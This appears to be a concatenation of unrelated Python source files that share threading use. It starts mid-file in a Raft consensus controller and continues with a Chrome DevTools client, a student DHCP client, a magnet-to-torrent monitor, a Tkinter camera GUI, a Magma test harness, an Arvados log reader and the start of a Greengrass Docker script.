if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and packet[Raft].sourceID == self.nodeID: # received the heartbeat from node -> node has won the election
if self.status == STATUSES['candidate']:
print('won election -> status = leader')
print('time elapsed (in ms): {}'.format((timer() - self.time)*1000))
self.status = STATUSES['leader']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and not packet[Raft].sourceID == self.nodeID:
# apparently doesn't work maybe because sourceID is overwritten somewhere in the pipeline before packet gets cloned
#if self.status == STATUSES['leader']:
print('stepping down not working')
self.status = STATUSES['follower']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
if packet[Raft].messageType == COMMANDS['HeartBeatResponse']: # received a cloned heartbeat response from node -> reset timeout
#print('resetting timeout; response to destinationID: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
if self.status == STATUSES['leader']:
print('stepping down as leader.')
self.status = STATUSES['follower']
self.init_timeout()
if packet[Raft].messageType == COMMANDS['AppendEntriesReply']: # received a cloned AppendEntries response from node -> reset timeout
#print('resetting timeout; AppendEntries from: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
if packet[Raft].messageType == COMMANDS['AppendEntries']:
print('starting Transaction: {}'.format(time.time()))
if packet[Raft].messageType == COMMANDS['NewRequest'] and self.status == STATUSES['leader']:
# received a redirected New Request from a client
# new request can be made only by controllers
self.counter_new_request += 1
print('New Request received; total: {}; time: {}'.format(self.counter_new_request, time.time()))
packet[Raft].sourceID = 0x0
packet[Raft].destinationID = self.nodeID
packet[IP].srcAddr = args.source
#packet[Raft].show()
send_no_reply(packet)
if (self.counter_new_request % 50) == 0 and self.nodeID == 4: # emulating failure
import os
print('emulating failure')
os._exit(0)
if packet[Raft].messageType == COMMANDS['RejectNewRequest']:
self.counter_rejected_requests += 1
print('New request rejected; total {}'.format(self.counter_rejected_requests))
#print('state : {}'.format(self.status))
if packet[Raft].messageType == COMMANDS['CommitValue']:
print('Transaction complete. time: {}'.format(time.time()))
if packet[Raft].messageType == COMMANDS['RetrieveLog']:
print('Retrieved Value: {} at Index: {}'.format(packet[Raft].data, packet[Raft].logIndex))
#logger.debug(packet.sprintf())
#packet[Raft].show()
def raft_timeout(self):
return random.randrange(RANDOM_TIMEOUT['min'], RANDOM_TIMEOUT['max']) / 1000
def reset_timeout(self):
self.election_time = time.time() + self.raft_timeout()
def init_timeout(self):
self.reset_timeout()
# safety guarantee, timeout thread may expire after election
if self.timeout_thread and self.timeout_thread.is_alive():
return
self.timeout_thread = threading.Thread(target=self.timeout_loop)
self.timeout_thread.start()
def heartbeats_loop(self):
rate = RAFT_HEARTBEAT_RATE / 1000
while True: # todo find a way to block this thread in a more clever way
if self.status == STATUSES['leader']:
#print('sending StartHeartbeat')
self.send_heartbeat_request()
time.sleep(rate)
else:
time.sleep(rate)
return
# the timeout function
def timeout_loop(self):
# only stop timeout thread when winning the election
while self.status != STATUSES['leader']:
delta = self.election_time - time.time()
if delta < 0:
self.start_election()
self.reset_timeout()
else:
time.sleep(delta)
return
def start_election(self):
print('starting election')
#logger.debug("{} starting election; status: {}, term:{}".format(self.controller_ip, self.status, self.term))
self.term += 1
start_election_message = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['Timeout']
)
send_no_reply(start_election_message)
def send_heartbeat_request(self):
#print("Sending heartbeat request")
#logger.debug("Starting HEARTBEATS")
heartbeat = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['StartHeartbeat']
)
send_no_reply(heartbeat)
# def main_handle_packet(packet):
# packet[Raft].show()
def is_ingoing_raft_packet(_packet):
if _packet.haslayer(IP):
if not _packet[IP].proto == 'icmp':
if _packet.haslayer(UDP):
if _packet[UDP].dport == RAFT_PROTOCOL_DSTPORT:
if _packet.haslayer(Raft):
#return True
if _packet[Raft].sourceID != 0x0:
return True
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Raft Packet Sender')
parser.add_argument(
'-s', '--source', help='select the node IP (default=10.0.1.1)', default='10.0.1.1', required=False,
type=str
)
parser.add_argument(
'-i', '--ID', help='ID of raft node', default='1', required=False,
type=int
)
args = parser.parse_args()
controller = Controller(args.source)
print('starting controller')
while True: # useless, only to keep the main thread alive
time.sleep(10)
|
cdp.py
|
import threading
import json
import websocket
from websocket import WebSocketTimeoutException, WebSocketConnectionClosedException
from types import FunctionType
from typing import Callable, Union
from .request import CDPRequest
from .response import CDPResponse
from .events import Events
from ..utils.logger import debug, info, warn, error
class CDP:
def __init__(self, ws_url, timeout=1):
self.ws_url = ws_url
self.timeout = timeout
self._tag = f'[T_{threading.get_ident()} ChromeDevTools]'
self._stop = threading.Event()
self._ws = None
self._ws_loop_th = None
self._is_running = False
self._id = 0
def __default_request_handler(request: CDPRequest) -> None:
request.resume()
self._event_handlers = {
'request': __default_request_handler,
'response': None
}
def __ws_loop(self):
"""
Loop to receive messages from websocket server
:return:
"""
while not self._stop.is_set():
try:
msg = self._ws.recv()
parsed = json.loads(msg)
# Intercept request/response
if 'method' in parsed:
event = parsed['method']
# Request handler
if event == Events.REQUEST.value:
if self._event_handlers['request'] is not None:
request = CDPRequest(self, parsed)
self._event_handlers['request'](request)
# Response handler
if event == Events.RESPONSE.value:
if self._event_handlers['response'] is not None:
response = CDPResponse(self, parsed)
self._event_handlers['response'](response)
except (WebSocketTimeoutException, WebSocketConnectionClosedException) as e:
continue
def call_method(self, method: str, **params) -> None:
"""
Call dev tools method with the given parameters
:param method: str
:param params:
:return: None
"""
if not self._ws or not self._ws.connected:
raise RuntimeError(self._tag + '\tWebsocket not connected')
self._id += 1
msg = {'id': self._id, 'method': method, 'params': params}
debug(self._tag, 'Calling method', msg)
self._ws.send(json.dumps(msg))
def start(self) -> None:
"""
Start ChromeDevTools client
:return: None
"""
if self._is_running:
raise RuntimeError(self._tag, 'It is already running')
debug(self._tag, 'Connecting to websocket', self.ws_url)
self._ws = websocket.create_connection(self.ws_url, enable_multithread=True, skip_utf8_validation=True)
self._ws.settimeout(self.timeout)
# Enable Fetch domain
self.call_method('Fetch.enable')
# Enable Network domain
self.call_method('Network.enable')
self._stop.clear()
self._ws_loop_th = threading.Thread(target=self.__ws_loop, daemon=True)
debug(self._tag, 'Starting websocket loop thread', self._ws_loop_th.ident)
self._ws_loop_th.start()
self._is_running = True
def stop(self) -> None:
"""
Stop ChromeDevTools client
:return: None
"""
self._stop.set()
if self._ws_loop_th:
self._ws_loop_th.join()
self._is_running = False
debug(self._tag, 'Closing websocket')
self._ws.close()
def on(self, event: str, cb: Union[Callable, None]) -> None:
"""
Override event handler
:param event: str
:param cb: Callable | None
:return: None
"""
if cb is not None and not isinstance(cb, FunctionType):
raise ValueError(self._tag + '\tCallback must be a function')
if event not in self._event_handlers.keys():
raise ValueError(self._tag + f'\tEvent must be one of ({", ".join(self._event_handlers.keys())})')
self._event_handlers[event] = cb
def set_user_agent(self, ua: str) -> None:
"""
Set user agent
:param ua: str
:return: None
"""
debug(self._tag, 'Setting user agent', ua)
self.call_method('Network.setUserAgentOverride', userAgent=ua)
|
Client2.py
|
import ipaddress
import random
import socket
import struct
import sys
from random import randint
from time import *
import threading
import math
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 68))
Mac = ""
XID = ""
BACKOFF_CUTOFF = 120
INITIAL_INTERVAL = 10
dis_time = 10
expire = False
def buildPacket_discovery(mac):
mac = str(mac).replace(":", "")
mac = bytes.fromhex(mac)
global Mac, XID
Mac = mac
print(Mac)
transactionID = b''
for i in range(4):
t = randint(0, 255)
transactionID += struct.pack('!B', t)
XID = transactionID
packet = b''
packet += b'\x01' # Message type: Boot Request (1)
packet += b'\x01' # Hardware type: Ethernet
packet += b'\x06' # Hardware address length: 6
packet += b'\x00' # Hops: 0
packet += transactionID # Transaction ID
packet += b'\x00\x00' # Seconds elapsed: 0
packet += b'\x80\x00' # Bootp flags:
packet += b'\x00\x00\x00\x00' # Client IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Your (client) IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Next server IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Relay agent IP address: 0.0.0.0
packet += mac
packet += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
packet += b'\x00' * 67 # Server host name
packet += b'\x00' * 125 # Boot file nam
packet += b'\x63\x82\x53\x63' # Magic cookie: DHCP
# DHCP IP Address
packet += b'\x35\x01\x01'
return packet
def buildPacket_request(serverip, offerip):
offerip = bytes(map(int, str(offerip).split('.')))
serverip = bytes(map(int, str(serverip).split('.')))
global Mac
packet = b''
packet += b'\x01' # Message type: Boot Request (1)
packet += b'\x01' # Hardware type: Ethernet
packet += b'\x06' # Hardware address length: 6
packet += b'\x00' # Hops: 0
# print(xid_hex)
packet += XID # Transaction ID
packet += b'\x00\x00' # Seconds elapsed: 0
packet += b'\x80\x00' # Bootp flags: 0x8000 (Broadcast) + reserved flags
packet += b'\x00\x00\x00\x00' # Client IP address: 0.0.0.0
packet += offerip # Your (client) IP address: 0.0.0.0
packet += serverip # Next server IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Relay agent IP address: 0.0.0.0
packet += Mac
packet += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # Client hardware address padding: 00000000000000000000
packet += b'\x00' * 67 # Server host name not given
packet += b'\x00' * 125 # Boot file name not given
packet += b'\x63\x82\x53\x63' # Magic cookie: DHCP
# DHCP IP Address
packet += b'\x35\x01\x03' # Option: (t=53,l=1) DHCP Message Type = DHCP Discover
return packet
def pkt_type(packet):
if packet[len(packet) - 1] == 2:
return "DHCPOFFER"
if packet[len(packet) - 1] == 5:
return "DHCPACK"
def parse_packet_client(pkt):
yiaddr_bytes = pkt[16:20]
yiaddr_original = ipaddress.IPv4Address(yiaddr_bytes)
siaddr_bytes = pkt[20:24]
siaddr_original = ipaddress.IPv4Address(siaddr_bytes)
mac_byte = pkt[28:34]
mac_original = mac_byte.hex(":")
return yiaddr_original, siaddr_original, mac_original
def start_process(mac):
print("Start Process")
global dis_time
sock.sendto(buildPacket_discovery(mac), ('<broadcast>', 67))
get_ip = False
getAck = False
finish = False
msg, b = sock.recvfrom(1024)
try:
data = msg.decode('utf-8')
print(data)
if "renew" in data:
getAck = True
get_ip = True
timer_thread = threading.Thread(target=lease_expire())
timer_thread.start()
elif "blocked" or "reserved" in data:
finish = True
quit()
except (UnicodeDecodeError, AttributeError):
print(pkt_type(msg))
offerip, serverip, mac = parse_packet_client(msg)
print(offerip)
sock.sendto(buildPacket_request(serverip, offerip), (str(serverip), 67))
print("send request")
getAck = False
sock.settimeout(2)
try:
msg, b = sock.recvfrom(1024)
if msg:
print("Ack {}".format(msg))
getAck = True
except socket.timeout:
print("Time out ...")
if getAck == False:
print("time out!!")
else:
print("No time out :)")
get_ip = True
timer_thread = threading.Thread(target=lease_expire())
timer_thread.start()
return getAck, get_ip, finish
def discovery_timer(initial_interval):
global dis_time
dis_time = initial_interval
while dis_time:
mins, secs = divmod(dis_time, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
# print(timer)
sleep(1)
dis_time -= 1
def lease_expire():
print("expire timer begin")
global expire
lease = 11
while lease > 0:
mins, secs = divmod(lease, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
print(timer)
sleep(1)
lease -= 1
expire = True
if __name__ == '__main__':
def discovery_timer(initial_interval):
print("discovery timer begin")
global dis_time
dis_time = initial_interval
while dis_time:
mins, secs = divmod(dis_time, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
# print(timer)
sleep(1)
dis_time -= 1
mac = input("Enter your mac address")
offer_ip = ""
flag = True
getAck = False
getIp = False
prv_dis = INITIAL_INTERVAL
while True:
timer_thread = threading.Thread(target=discovery_timer, args=(dis_time,))
timer_thread.start()
while dis_time > 0:
while not getAck:
getAck, getIp, finish = start_process(mac)
if finish:
sys.exit()
# timer_thread = threading.Thread(target=lease_expire())
# timer_thread.start()
if dis_time <= 0:
rand = random.uniform(1, 200) / 200
print(rand)
print("Discovery timer finish..Go to begin timer again")
if getAck == False:
print("Get ip Not OK..Try again")
if prv_dis >= BACKOFF_CUTOFF:
dis_time = BACKOFF_CUTOFF
print("Next discovery time {}".format(dis_time))
else:
generate = prv_dis * 2 * rand
print(generate)
dis_time = math.floor(generate)
print("Next discovery time {}".format(dis_time))
prv_dis = dis_time
elif getIp == True:
if expire == True:
print("IP expired")
expire = False
if prv_dis >= BACKOFF_CUTOFF:
dis_time = BACKOFF_CUTOFF
print("Next discovery time {}".format(dis_time))
else:
generate = prv_dis * 2 * rand
print(generate)
dis_time = math.floor(generate)
print("Next discovery time {}".format(dis_time))
prv_dis = dis_time
else:
while expire == False:
pass
# print("wait for IP to expire")
expire = False
if prv_dis >= BACKOFF_CUTOFF:
dis_time = BACKOFF_CUTOFF
print("Next discovery time {}".format(dis_time))
else:
generate = prv_dis * 2 * rand
print(generate)
dis_time = math.floor(generate)
print("Next discovery time {}".format(dis_time))
prv_dis = dis_time
getIp = False
getAck = False
|
mtsleepD.py
|
#!/usr/bin/venv python3
import threading
from time import sleep, ctime
loops = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.nanme = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target=ThreadFunc(loop, (i, loops[i]), loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print('all DONE at:', ctime())
if __name__ == '__main__':
main()
|
main.py
|
import os
import atexit
from pathlib import Path
from argparse import ArgumentParser
import shutil
import sys
import threading
import logging
import coloredlogs
import requests
from decouple import config
from cachetools import cached, TTLCache
from filesystem.folderwatcher import folderwatcher
from filesystem.FileSystemHandler import FileSystemHandler
from torrents.trackers import TrackerManager
from torrents.clients import InternalClient, TransmissionClient
from web import start
import web
class Monitor:
def __init__(self):
self.logger= logging.getLogger('Monitor worker')
uid = os.getuid()
self.logger.debug('Running as uid: {0}'.format(uid))
folder_watch= config('magnet_watch')
# Make sure we have read permissions to
if not os.access(folder_watch, os.R_OK):
self.logger.error("Watch directory: '{0}' doesn't exit or not readable by user {1}".format(folder_watch,uid))
sys.exit("Unable to read: '{0}' ".format(folder_watch))
else:
self.logger.debug("Watch directory: '{0}' is readable".format(folder_watch))
torrent_blackhole= config('torrent_blackhole',default=folder_watch)
# Make sure we have read permissions to
if not os.access(torrent_blackhole, os.W_OK):
self.logger.error("Blackhole: '{0}' doesn't exit or not writeable by user: {1}".format(torrent_blackhole,uid))
sys.exit("Unable to read/write to: '{0}' ".format(torrent_blackhole))
else:
self.logger.debug("Blackhole directory: '{0}' is writeable ".format(torrent_blackhole))
@cached(cache=TTLCache(maxsize=500,ttl=86400))
def load_trackers(self):
trackers_from = config('trackers','https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all.txt')
trackers = requests.get(trackers_from).content.decode('utf8').split('\n\n')[:-1]
self.logger.info('{0} trackers loaded.'.format(len(trackers)))
return trackers
def start(self):
parser = ArgumentParser(description='A tool to convert magnet links to .torrent files')
monitorparser= parser.add_argument_group('Watch folder for magnet files and conver to torrent')
monitorparser.add_argument('--monitor',default=True,action='store_true')
magnetparser= parser.add_argument_group('Process single magnet file')
magnetparser.add_argument('-m','--magnet', help='The magnet url')
magnetparser.add_argument('-o','--output', help='The output torrent file name')
args = vars(parser.parse_known_args()[0])
output = None
if args['output'] is not None:
output = args['output']
if len(sys.argv) == 1:
self.logger.warning('No arguments passed, defaulting to monitor mode')
args['monitor']='monitor'
client= InternalClient(self.logger,self.load_trackers())
if args['monitor'] is not None and args['monitor']=='monitor':
self.logger.info('Starting monitor mode')
folder_watch=config('magnet_watch')
self.logger.info('Blackhole folder: {0}'.format(os.path.abspath(folder_watch)))
output=config('torrent_blackhole',default=folder_watch)
self.logger.info('Processing existing files: {0}'.format(os.path.abspath(folder_watch)))
magnets=Path(folder_watch).glob('*.magnet')
for magnet in magnets:
self.logger.info('Processing file: {0}'.format(os.path.basename(magnet)))
magnet_contents=Path(magnet).read_text()
self.logger.debug('Loading magnet: {0}'.format(magnet.name))
torrent_path=client.magnet2torrent(magnet_contents,output)
magnet_processed=str(os.path.abspath(magnet))
if torrent_path is not None:
magnet_processed +='.processed'
else:
magnet_processed +='.err'
shutil.move(magnet,magnet_processed)
folder_watcher = folderwatcher(folder_watch,FileSystemHandler(client))
folder_watcher.start()
elif args['magnet'] is not None:
client.magnet2torrent(args['magnet'], output)
def main():
# set thread name
threading.current_thread().name = 'MAIN'
logger = logging.getLogger('MAIN')
coloredlogs.install(level=config('log_level',default='debug'),fmt='[%(asctime)s] %(name)s[%(process)d]: %(message)s')
logger.info('Starting program version: {0}')
global APP
try:
logger.info('Setting log level: {0}'.format(config('log_level',default='debug')))
webserver=threading.Thread(target= web.start, daemon=True)
webserver.name='Web'
webserver.start()
if not config('transmission_host',default='') == '':
client=TransmissionClient(config('transmission_host'),config('transmission_user',default=''),config('transmission_password',default=''),config('transmission_port',default=9091))
tmanager=TrackerManager(client=client,interval=config('tracker_sync_interval',default=30*3600))
trackerthread=threading.Thread(target=tmanager.start, daemon=True)
trackerthread.name= 'Tracker Manager'
trackerthread.start()
APP=Monitor()
# APP.start()
appthread=threading.Thread(target=APP.start, daemon=True)
appthread.name= 'Monitor'
appthread.start()
logger.info('Thread loading completed')
appthread.join()
logger.info('Program started')
except SystemExit as sysex:
logger.error('Critical error: {0}'.format(sysex))
except KeyboardInterrupt as kex:
logger.error('Keyboard interrupt: {0}'.format(kex))
if __name__ == '__main__':
main()
@atexit.register
def _exithandler():
logging.getLogger('MAIN').error('Program shutting down')
|
GUI.py
|
import Tkinter as Tk
from Video_Process import *
from threading import Thread
class GUI:
def __init__(self):
# Main windows of the app
self.root = Tk.Tk()
self.root.title("Selfie Camera")
self.root.geometry("1156x620")
self.video_processor = VideoProcess()
self.video_processor.parent = self
self.create_left_frame()
self.create_right_frame()
# Output photo count
self.photo_count = 0
self.root.mainloop()
# Left video frame initialization
def create_left_frame(self):
# Left panel of photo and snap button
frame_left = Tk.Frame(self.root)
# Label to display the graphic from carema
self.video = Tk.Label(frame_left, width=1024, height=576)
# Start the speech recognition and video thread separately
camera_module = Thread(target=self.video_processor.show_frame)
speech_module = Thread(target=self.video_processor.speech_module.speech_rec)
camera_module.start()
# Set speech recognition thread to daemon so that exit callback can work
speech_module.daemon = True
speech_module.start()
self.video.pack()
# Take picture button
Tk.Button(frame_left, text='TAKE PICTURE', command=self.snap_call).pack(ipady=10, ipadx=465, expand=True)
frame_left.pack(side=Tk.LEFT, fill=Tk.BOTH)
# Right function frame initialization
def create_right_frame(self):
# Right panel of control functions
frame_right = Tk.Frame(self.root)
# Zoom functions button
Tk.Label(frame_right, text="ZOOM").pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='+', command=self.zoom1_callback).pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='-', command=self.zoom2_callback).pack(fill=Tk.X, ipady=10)
# Blur functions
Tk.Label(frame_right, text="BLUR").pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='+', command=self.blur1_callback).pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='-', command=self.blur2_callback).pack(fill=Tk.X, ipady=10)
# Brightness control
self.gain = Tk.IntVar()
Tk.Label(frame_right, text='BRIGHTNESS').pack(fill=Tk.X, ipady=10)
Tk.Scale(frame_right, orient=Tk.HORIZONTAL, variable=self.gain, from_=-50, to=50).pack(fill=Tk.X)
# Filter control buttons
Tk.Button(frame_right, text="Country", command=self.country_callback).pack(fill=Tk.X, ipady=13)
Tk.Button(frame_right, text="Desert", command=self.desert_callback).pack(fill=Tk.X, ipady=13)
Tk.Button(frame_right, text="Lumo", command=self.lumo_callback).pack(fill=Tk.X, ipady=13)
Tk.Button(frame_right, text="Nashville", command=self.nashville_callback).pack(fill=Tk.X, ipady=13)
# Speech recognition enable
self.speech_button = Tk.Button(frame_right, text="Voice Enable", command=self.speech_enable_callback)
self.speech_button.pack(fill=Tk.X, ipady=13)
# Exit button
Tk.Button(frame_right, text="Exit", command=self.exit_callback).pack(fill=Tk.X, ipady=13)
frame_right.pack(side=Tk.LEFT, fill=Tk.BOTH, expand=True)
# snap button
def snap_call(self):
file_name = 'photo_' + str(self.photo_count) + '.jpg'
self.photo_count = self.photo_count + 1
img = np.array(self.video_processor.img_f)
cv2.imwrite(file_name, cv2.cvtColor(img,cv2.COLOR_RGBA2BGRA))
# Zoom in callback
def zoom1_callback(self):
if self.video_processor.ratio < 2:
self.video_processor.ratio += 0.1
# Zoom out callback
def zoom2_callback(self):
if self.video_processor.ratio > 1:
self.video_processor.ratio -= 0.1
# Blur callback
def blur1_callback(self):
if self.video_processor.blur < 9:
self.video_processor.blur += 2
# Reduce blur callback
def blur2_callback(self):
if self.video_processor.blur > 3:
self.video_processor.blur -= 2
# Filter callback functions
def country_callback(self):
if self.video_processor.do_filter == 1:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 1
def desert_callback(self):
if self.video_processor.do_filter == 2:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 2
def lumo_callback(self):
if self.video_processor.do_filter == 3:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 3
def nashville_callback(self):
if self.video_processor.do_filter == 4:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 4
# Speech recognition enable callback
def speech_enable_callback(self):
self.video_processor.speech_enable = not self.video_processor.speech_enable
if self.video_processor.speech_enable:
self.speech_button.config(text="Voice Disable")
else:
self.speech_button.config(text="Voice Enable")
# Exit callback
def exit_callback(self):
exit(1)
def get_video(self):
return self.video
if __name__ == '__main__':
Gui = GUI()
|
start_pipelined.py
|
"""
Copyright (c) 2018-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import logging
import threading
import subprocess
from enum import Enum
from collections import namedtuple
from concurrent.futures import Future
from magma.pipelined.rule_mappers import RuleIDToNumMapper
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.tests.app.exceptions import ServiceRunningError,\
BadConfigError
from ryu.base.app_manager import AppManager
from ryu.lib import hub
class TestSetup(object):
"""
The TestSetup class variables
apps: [Controller]: ryu apps to instantiate
references: [Controller]: futures to get references of
instantiated apps
config: dict: config for ryu app
mconfig: dict: mconfig for ryu app
service_manager: ServiceManager: service manager for ryu app
integ_test: bool: set true when running tests in
integ setting
"""
def __init__(self, apps, references, config, mconfig, loop,
service_manager, integ_test=False, rpc_stubs=None):
self.apps = apps
self.references = references
self.config = config
self.mconfig = mconfig
self.service_manager = service_manager
self.loop = loop
self.integ_test = integ_test
if rpc_stubs is None:
rpc_stubs = {}
self.rpc_stubs = rpc_stubs
Controller = namedtuple('Controller', ['name', 'app_future'])
class PipelinedController(Enum):
InOut = Controller(
'magma.pipelined.app.inout', 'inout'
)
Arp = Controller(
'magma.pipelined.app.arp', 'arpd'
)
Enforcement = Controller(
'magma.pipelined.app.enforcement', 'enforcement'
)
Enforcement_stats = Controller(
'magma.pipelined.app.enforcement_stats', 'enforcement_stats'
)
Testing = Controller(
'magma.pipelined.app.testing', 'testing'
)
Meter = Controller(
'magma.pipelined.app.meter', 'meter'
)
MeterStats = Controller(
'magma.pipelined.app.meter_stats', 'meter_stats'
)
AccessControl = Controller(
'magma.pipelined.app.access_control', 'access_control'
)
Subscriber = Controller(
'magma.pipelined.app.subscriber', 'subscriber'
)
UEMac = Controller(
'magma.pipelined.app.ue_mac', 'ue_mac'
)
TunnelLearnController = Controller(
'magma.pipelined.app.tunnel_learn', 'tunnel_learn'
)
PacketTracer = Controller(
'magma.pipelined.app.packet_tracer', 'packet_tracer'
)
def assert_pipelined_not_running():
"""
As Ryu applications shoudn't be started if the magma@pipelined service is
running we need to verify if pipelined is active. If service is running
throws a ServiceRunningError exception.
This can be done using the command:
systemctl is-active magma@pipelined
If service is pipelined, this returns an error code 3 & message "inactive"
"""
try:
output = subprocess.check_output(
["systemctl", "is-active", "magma@pipelined"]
)
except subprocess.CalledProcessError as e:
if "inactive" not in str(e.output, 'utf-8'):
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"caused an error code %d, exception - %s"
% (e.returncode, str(e.output, 'utf-8').strip())
)
else:
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"output - %s" % str(output, 'utf-8').strip()
)
class StartThread(object):
"""
Starts ryu applications
Uses ryu hub and ryu app_manager to launch ryu applications. By using
futures get references to the instantiated apps. This allows unittests to
call methods from pipelined apps.
"""
_Event = namedtuple('_Event', ['func', 'future'])
def __init__(self, test_setup, launch_successful_future):
""" If verification fails throw an exception, don't start ryu apps """
if test_setup.integ_test is False:
hub.patch(thread=True)
assert_pipelined_not_running()
self._test_setup = test_setup
self.keep_running = True
self.done = False
self.event_queue = hub.Queue()
thread = threading.Thread(
target=self.start_ryu_apps, args=(launch_successful_future,))
thread.daemon = True
thread.start()
def start_ryu_apps(self, launch_successful_future):
"""
Starts up ryu applications, all the configuration is parsed from the
test_setup config provided in the unit test.
If apps throw an exception on launch, error is passed in the
launch_successful_future and will prevent infinitely waiting.
"""
self.reset_static_vars()
hub.spawn(self._process_queue)
app_lists = [a.value.name for a in self._test_setup.apps]
app_futures = {
controller.value.app_future: future
for (controller, future) in self._test_setup.references.items()
}
manager = AppManager.get_instance()
manager.load_apps(app_lists)
contexts = manager.create_contexts()
contexts['sids_by_ip'] = {} # shared by both metering apps
contexts['rule_id_mapper'] = RuleIDToNumMapper()
contexts['session_rule_version_mapper'] = \
self._test_setup.service_manager.session_rule_version_mapper
contexts['app_futures'] = app_futures
contexts['config'] = self._test_setup.config
contexts['mconfig'] = self._test_setup.mconfig
contexts['loop'] = self._test_setup.loop
contexts['rpc_stubs'] = self._test_setup.rpc_stubs
contexts['service_manager'] = self._test_setup.service_manager
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s %(levelname)s %(name)s] %(message)s')
services = []
try:
services.extend(manager.instantiate_apps(**contexts))
except Exception as e:
launch_successful_future.set_result(
"Ryu apps launch exception: {}".format(e))
raise
launch_successful_future.set_result("Setup successful")
self.run(manager)
def _process_queue(self):
"""
Run a queue to process external events that need to be run in the Ryu
greenthread
"""
while self.keep_running:
try:
event = self.event_queue.get(block=False)
val = event.func()
event.future.set_result(val)
except hub.QueueEmpty:
pass
finally:
hub.sleep(0.1)
def run_in_greenthread(self, func):
"""
When not monkey patching (i.e. when running a gRPC server), you cannot
call directly into a Ryu app. To do this, there needs to be a boundary
between futures and hub.Queues. When this function is called, a lambda
is passed which is sent into a queue to be run by the Ryu greenthread.
"""
ev = self._Event(func=func, future=Future())
self.event_queue.put(ev)
return ev.future.result()
def run(self, manager):
""" Keep running until signalled from test file """
while self.keep_running:
hub.sleep(1)
manager.close()
self.done = True
def reset_static_vars(self):
""" Reset static vars for running nosetests """
AppManager._instance = AppManager()
MagmaController.TABLES = {}
|
reader.py
|
from __future__ import print_function
import arvados
import Queue
import threading
import _strptime
from crunchstat_summary import logger
class CollectionReader(object):
def __init__(self, collection_id):
logger.debug('load collection %s', collection_id)
collection = arvados.collection.CollectionReader(collection_id)
filenames = [filename for filename in collection]
if len(filenames) != 1:
raise ValueError(
"collection {} has {} files; need exactly one".format(
collection_id, len(filenames)))
self._reader = collection.open(filenames[0])
self._label = "{}/{}".format(collection_id, filenames[0])
def __str__(self):
return self._label
def __iter__(self):
return iter(self._reader)
class LiveLogReader(object):
EOF = None
def __init__(self, job_uuid):
logger.debug('load stderr events for job %s', job_uuid)
self.job_uuid = job_uuid
def __str__(self):
return self.job_uuid
def _get_all_pages(self):
got = 0
last_id = 0
filters = [
['object_uuid', '=', self.job_uuid],
['event_type', '=', 'stderr']]
try:
while True:
page = arvados.api().logs().index(
limit=1000,
order=['id asc'],
filters=filters + [['id','>',str(last_id)]],
select=['id', 'properties'],
).execute(num_retries=2)
got += len(page['items'])
logger.debug(
'%s: received %d of %d log events',
self.job_uuid, got,
got + page['items_available'] - len(page['items']))
for i in page['items']:
for line in i['properties']['text'].split('\n'):
self._queue.put(line+'\n')
last_id = i['id']
if (len(page['items']) == 0 or
len(page['items']) >= page['items_available']):
break
finally:
self._queue.put(self.EOF)
def __iter__(self):
self._queue = Queue.Queue()
self._thread = threading.Thread(target=self._get_all_pages)
self._thread.daemon = True
self._thread.start()
return self
def next(self):
line = self._queue.get()
if line is self.EOF:
self._thread.join()
raise StopIteration
return line
|
DockerPython.py
|
# DockerPython.py
# Demonstrates an alternative to CDDDockerJava for managing docker containers
# See README.md
import json
import logging
import os
import platform
import docker
import threading
import greengrasssdk
import boto3
import base64
# main is located at the bottom of this file
# Create a greengrass core sdk client
